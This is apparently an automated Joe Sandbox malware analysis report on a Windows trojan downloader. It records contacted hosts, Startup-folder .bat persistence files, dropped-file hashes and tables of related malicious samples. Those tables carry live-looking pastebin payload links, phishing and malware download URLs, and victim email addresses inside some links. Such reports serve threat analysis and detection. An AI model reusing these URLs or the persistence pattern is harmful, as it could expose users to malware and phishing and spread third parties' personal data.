https://iplogger.org/privacy/	MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.4.235	pastebin.com	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	yip.su	European Union	13335	CLOUDFLARENETUS	false
104.21.76.57	iplogger.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1512141
Start date and time:	2024-09-16 21:19:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	61
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@87/26@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.7.2.167, 184.28.90.27, 20.114.59.183, 192.229.221.95, 52.165.164.15, 93.184.221.240, 20.242.39.171, 13.64.180.106
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target MSBuild.exe, PID 1340 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Simulations

Behavior and APIs

Time	Type	Description
15:20:08	API Interceptor	3x Sleep call for process: svchost.exe modified
15:20:09	API Interceptor	7970079x Sleep call for process: MSBuild.exe modified
15:20:09	API Interceptor	21x Sleep call for process: powershell.exe modified
21:20:10	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat
21:20:24	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATW4YMuey528R5HSnE54AwE5.bat
21:20:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat
21:20:45	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3KsdkaRiL7RacJah2YobpSxj.bat
21:20:53	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u0RvkxN9wEthGCCLh4tn7zqU.bat
21:21:13	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4KsgxmPNACDuZ2zjqQjtltvX.bat
21:21:26	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3njSfWDGOVl28Hs8hyJ6Y7LT.bat
21:21:34	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat
21:21:48	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9O41Qow2bZeAiNaUuBCU9sI8.bat
21:21:56	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FLz6tWFKVQbppt2Sn3SWxNu4.bat
21:22:04	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8NYZUwJycflpNiJIlSTOBho.bat
21:22:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aPLL8m8adxhtzUUH2fMBYP78.bat
21:22:26	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdci9HHJSUc0QT0L7qkU4ePj.bat
21:22:35	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nGizfduNOl4JVOkYHOr4NIAN.bat
21:22:43	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NtFoY6Vi2WtE4qAcwOzUXMHK.bat
21:22:52	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.bat
21:23:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C8TVyoaND4r7GWzWKeeVLeMP.bat
21:23:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fKQUct9QxCcX5qlUcu38pRMl.bat
21:23:24	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBNY7HBfHixtkjGDaljf7VCr.bat
21:23:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jl2Nqcc7XWeOOYztXFcYbkmD.bat
21:23:41	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat
21:23:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OK2XFEh3D7xuLDF5l083mPKW.bat
21:23:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p04DXHk7aV49bHDBuFA6B2XV.bat
21:24:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w4Vb1MlA9QEh0DSqb5C91v1J.bat

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.4.235	envifa.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Invoice Payment N8977823.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Pending_Invoice_Bank_Details_XLSX.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Pending_Invoice_Bank_Details_kofce_.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Update on Payment.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
188.114.97.3	SwiftMesaj.pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse	vlha.shop/LP341/index.php
	Petronas request for-quotation.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	SecuriteInfo.com.Trojan.Siggen29.8143.15092.30622.exe	Get hash	malicious	Xmrig	Browse	down.mvip8.ru/7z.dll
	3XRUFJRb3K.dll	Get hash	malicious	Unknown	Browse	web.ad87h92j.com/4/t.bmp
	8CoDx513sS.exe	Get hash	malicious	Nitol	Browse	web.ad87h92j.com/4/t.bmp
	http://infofunctionboard.autos/	Get hash	malicious	Unknown	Browse	infofunctionboard.autos/check-online
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3?j=eyJ1IjoiNGQydGxqIn0.nUqvCKS4pzEN7oIgjX67rfaG_zpqbsbEevJ7SYpXFUg	Get hash	malicious	HTMLPhisher	Browse	link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/lPrdr8CZ/download
	Purchase order.exe	Get hash	malicious	FormBook	Browse	www.x0x9x8x8x7x6.shop/assb/
	http://aivx.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	aivx.pages.dev/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
yip.su	file.exe	Get hash	malicious	DarkTortilla, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	DarkTortilla	Browse	188.114.97.3
	jFzg3KFP48.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	BsMXrWBfhT.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	BsMXrWBfhT.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	188.114.97.3
	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	188.114.96.3
	Setup3.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
pastebin.com	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	104.20.4.235
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	104.20.3.235
	SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	OTPAuthenticator.wsf	Get hash	malicious	AsyncRAT	Browse	104.20.3.235
	SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.3.235
	PjkFCWhi.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	BootstrapperV1.19.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.20.3.235
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.20.3.235
	GKrKPXOkdF.zsb.dll	Get hash	malicious	Unknown	Browse	104.20.3.235
	bdsBbxwPyV.ena.dll	Get hash	malicious	Unknown	Browse	104.20.3.235
iplogger.com	file.exe	Get hash	malicious	DarkTortilla, PureLog Stealer	Browse	104.21.76.57
	file.exe	Get hash	malicious	DarkTortilla	Browse	104.21.76.57
	Setup3.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	file.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Get hash	malicious	DarkTortilla	Browse	172.67.188.178
	file.exe	Get hash	malicious	DarkTortilla	Browse	172.67.188.178
	yLfAxBEcuo.exe	Get hash	malicious	Cryptbot, Vidar, Xmrig	Browse	172.67.188.178
	Arc453466701.msi	Get hash	malicious	Unknown	Browse	104.21.76.57
	Arc453466701.msi	Get hash	malicious	Metamorfo	Browse	104.21.76.57
	Arc453466701.msi	Get hash	malicious	Metamorfo	Browse	104.21.76.57
fp2e7a.wpc.phicdn.net	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%66%73%6D%2E%6F%72%67%2E%72%6F%2F%6C%6F%74%74%69%2FzCNhYdpH0BbGd346bztVvGGz/cmRlbGNhbXBvQHBhbGxpc2VyLmNh	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://docusignonline.site/#66d696368656c652e6d6167616e6140646f742e676f76	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	192.229.221.95
	https://gateway.lighthouse.storage/ipfs/bafybeidlhhhfoqqu52nkwbnjq6g6q2h4p5rl4ewwwzv5a45f2vw46ogi2i#muzzammil.ahussain@almosafer.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://www.thiajb.udvnyddvpd.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://atpscan.global.hornetsecurity.com/?d=ZsOSHznU8R-gGRR7oM-Cg6ujQ4_Q_1fLUMphjOdT51rX_sKxWE8tIpo7ubQp-u4N&f=lmPtJUCEVOVQCEi90TgsegxY8Ixy1ti-Yl_RivhGuVi9GrtlY8iwst3MKRdLWtjk6QrN_IgJVIIJLxTyRJNgqg&i=&k=heXN&m=qy4iE7gchHV2dLZQEkXzABxKQTyhovK-WARnBFNT3ogAOGu3nR7KSKGn79ued8ppKNJXKYgBy8OLU8Z0yd3arX0Z10C_ZClZ6iD3jkKTiyqiGMJ1AadypaEIRLhtjla1&n=ESoNKj3sRAoR3XeUGTgiTWlwpFtRouMH6AqVcfeoDgmEyOAEC-Hver8kuH4SwA49oQUq2JPzbofeW7CjGr-SV1y9NXTDJ3Aq9xtsab1s4qs&r=TieXKjh_oxjBtPephCShVU54ihAmTqPvVFW-4QEAU3qrO_dqswFterUAAtLfGmYm&s=4d4310a6b3d4d6c337aa3ca1938b86bc39087234d8d34de175713fc250d36deb&u=https%3A%2F%2Ftrailer.web-view.net%2FLinks%2F0X5CFB755FF4AA0A0D72DD13D1936DA6E24D57CCF14CEEBBC7AD15835FB7720953B56E0AF76F0F0BCFE051ECAB18E836AA913F868370F46030046ED1B003034C97CF9966854362669D.htm	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://t1.a.editions-legislatives.fr/r/?id=hfe20c57e,3602a3f1,7f94ba88&p1=r%C2%ADi%C2%ADck%C2%ADmo%C2%ADs%C2%ADe%C2%ADr.%E2%80%8Bne%C2%ADt/new/con/fizJIWtWK8AKaojOMzIDGeMk/ZWxlY3Ryb25pYy5wYXltZW50c0BjbGVhcndhdGVycGFwZXIuY29t	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://gateway.lighthouse.storage/ipfs/bafybeidlhhhfoqqu52nkwbnjq6g6q2h4p5rl4ewwwzv5a45f2vw46ogi2i#muzzammil.ahussain@almosafer.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://millersgearupforsport.co.uk/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://epayindia.epayperformance.com/Login.aspx?AppraisalId=6864	Get hash	malicious	Phisher	Browse	192.229.221.95
	http://c7q.vitiacarc.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Play-Audio_Now(Steven.haerle)CLQD.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Play-Audio_Now(Steven.haerle)CLQD.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fconexaocristo.com.br%2Fcove%2FEHCXZRepFDUboNiwWUjWnKH5/a2NhcnNvbkBtb250cm9zZS1lbnYuY29t	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Quotation.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	http://docusignonline.site/#66d696368656c652e6d6167616e6140646f742e676f76	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	104.19.229.21
	Quarantined Messages.zip	Get hash	malicious	HTMLPhisher	Browse	104.16.144.15
	https://gateway.lighthouse.storage/ipfs/bafybeidlhhhfoqqu52nkwbnjq6g6q2h4p5rl4ewwwzv5a45f2vw46ogi2i#muzzammil.ahussain@almosafer.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	ForwardedMessage.eml	Get hash	malicious	Unknown	Browse	104.18.11.207
	433.docx.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.13.205
	https://www.phoenixartstudio.net/?keyvalue=93749&page=https%3A%2F%2Fshdeiw.com%2Fsewirsd	Get hash	malicious	Unknown	Browse	162.159.133.90
CLOUDFLARENETUS	Play-Audio_Now(Steven.haerle)CLQD.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Play-Audio_Now(Steven.haerle)CLQD.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fconexaocristo.com.br%2Fcove%2FEHCXZRepFDUboNiwWUjWnKH5/a2NhcnNvbkBtb250cm9zZS1lbnYuY29t	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Quotation.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	http://docusignonline.site/#66d696368656c652e6d6167616e6140646f742e676f76	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	104.19.229.21
	Quarantined Messages.zip	Get hash	malicious	HTMLPhisher	Browse	104.16.144.15
	https://gateway.lighthouse.storage/ipfs/bafybeidlhhhfoqqu52nkwbnjq6g6q2h4p5rl4ewwwzv5a45f2vw46ogi2i#muzzammil.ahussain@almosafer.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	ForwardedMessage.eml	Get hash	malicious	Unknown	Browse	104.18.11.207
	433.docx.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.13.205
	https://www.phoenixartstudio.net/?keyvalue=93749&page=https%3A%2F%2Fshdeiw.com%2Fsewirsd	Get hash	malicious	Unknown	Browse	162.159.133.90
CLOUDFLARENETUS	Play-Audio_Now(Steven.haerle)CLQD.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Play-Audio_Now(Steven.haerle)CLQD.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fconexaocristo.com.br%2Fcove%2FEHCXZRepFDUboNiwWUjWnKH5/a2NhcnNvbkBtb250cm9zZS1lbnYuY29t	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Quotation.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	http://docusignonline.site/#66d696368656c652e6d6167616e6140646f742e676f76	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	104.19.229.21
	Quarantined Messages.zip	Get hash	malicious	HTMLPhisher	Browse	104.16.144.15
	https://gateway.lighthouse.storage/ipfs/bafybeidlhhhfoqqu52nkwbnjq6g6q2h4p5rl4ewwwzv5a45f2vw46ogi2i#muzzammil.ahussain@almosafer.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	ForwardedMessage.eml	Get hash	malicious	Unknown	Browse	104.18.11.207
	433.docx.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.13.205
	https://www.phoenixartstudio.net/?keyvalue=93749&page=https%3A%2F%2Fshdeiw.com%2Fsewirsd	Get hash	malicious	Unknown	Browse	162.159.133.90

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Play-Audio_Now(Steven.haerle)CLQD.html	Get hash	malicious	HTMLPhisher	Browse	104.20.4.235 188.114.97.3 104.21.76.57
	Quotation.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.20.4.235 188.114.97.3 104.21.76.57
	http://www.thiajb.udvnyddvpd.com/	Get hash	malicious	Unknown	Browse	104.20.4.235 188.114.97.3 104.21.76.57
	433.docx.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.20.4.235 188.114.97.3 104.21.76.57
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	104.20.4.235 188.114.97.3 104.21.76.57
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	104.20.4.235 188.114.97.3 104.21.76.57
	https://gateway.lighthouse.storage/ipfs/bafybeidlhhhfoqqu52nkwbnjq6g6q2h4p5rl4ewwwzv5a45f2vw46ogi2i#muzzammil.ahussain@almosafer.com	Get hash	malicious	Unknown	Browse	104.20.4.235 188.114.97.3 104.21.76.57
	#29469O204.exe	Get hash	malicious	AgentTesla	Browse	104.20.4.235 188.114.97.3 104.21.76.57
	hesaphareketi-01_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.20.4.235 188.114.97.3 104.21.76.57
	https://www.kisa.link/bPvju	Get hash	malicious	Phisher	Browse	104.20.4.235 188.114.97.3 104.21.76.57

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.35901589905449205
Encrypted:	false
SSDEEP:	6:6xKdoaaD0JOCEfMuaaD0JOCEfMKQmDCexKdoaaD0JOCEfMuaaD0JOCEfMKQmDC:6aaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
MD5:	C788EDB928436D0CE10A5BF198837D8A
SHA1:	F104B6AB797E0B16362BFB69F5000407CE6EFFD8
SHA-256:	E309925E38D727B91C5B0AD9FC86A778ECD0EBE80261F55E870AD6685B0CC0BD
SHA-512:	61F750C97F2E1EAF623486147F55B4BF39C34DF28DD124FA378973965A2AE0AAA967D71C88BE0D02E1B2D2B22E20199B9E817BE793A10C0CC9D12FE703E18CF2
Malicious:	false
Preview:	*.>...........k.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................k.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7303849555168496
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0T:9JZj5MiKNnNhoxuO
MD5:	A713A622989BBA2CCEE76C8079D7D2CD
SHA1:	B6E4B18D68451B16092B992F77B101FEBAE03676
SHA-256:	A9E49A8D9D9425E523BC6591D6DA7126BA3C6C281A43113DFB6259938A045DC7
SHA-512:	9CE7742E128781BFCCE1DA38E18F51C4371C1CAB397BA2B3D6410A80189926A9DA844FAE03F7381798903A3D9192A4D3D8869C7E75E50BD92B5317ED443FCD61
Malicious:	false
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xc4349413, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6291483968958587
Encrypted:	false
SSDEEP:	1536:PSB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:Paza9iJa+2UtmOQOL
MD5:	9FCDBE031936E932B863299A9DB0900F
SHA1:	256538B1655D96E1F1B5CB9DA9E914F38D7220EC
SHA-256:	4E456851D10F45883F185E0535570992E4A525DDAA381C47750F33920CDF5146
SHA-512:	EF04BA8A9E6B41BC622A3C92EB40FC1B9226442AC1B3116125619440764A37765281D3273000965C8DA23D0EDFF587B1B9A2B7B6E07C29747EE9DB9AB2BE3F4E
Malicious:	false
Preview:	.4..... .......P.......X\...;...{......................0.j..........\|.......\|..h.g..........\|..0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................E.....\|...................a<......\|...........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07949203783097569
Encrypted:	false
SSDEEP:	3:/JllWetYebwmKeG9lweD4A27xs/9MG9lYllHol///lZMPCyH:hzbJKe/G1wpo5
MD5:	CB0E678C968F40ADFA26718B18D6C496
SHA1:	B4B0C4D74EE99416CA4B438EE6EB00CAE2DB4280
SHA-256:	499ED7937E5016F739147AE06189898A1B84C7A9218EF44BC4ECBBD67BD4A54A
SHA-512:	0146C956101E27C9B1DF9B1DF2EA589D496950CB99084332C2689C87BAC7437759CB2DE11ED088DA911EDC6BBF4E9E5C44F338C6ABAA505E1470C6EE481A6F18
Malicious:	false
Preview:	..eP.....................................;...{.......\|.......\|...............\|.......\|...a{#.....\|g..................a<......\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\FMT2OeifGUTNfkZyqLG0jeEO.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7462
Entropy (8bit):	5.420482116403958
Encrypted:	false
SSDEEP:	192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
MD5:	77F762F953163D7639DFF697104E1470
SHA1:	ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
SHA-256:	D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
SHA-512:	D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
Malicious:	false
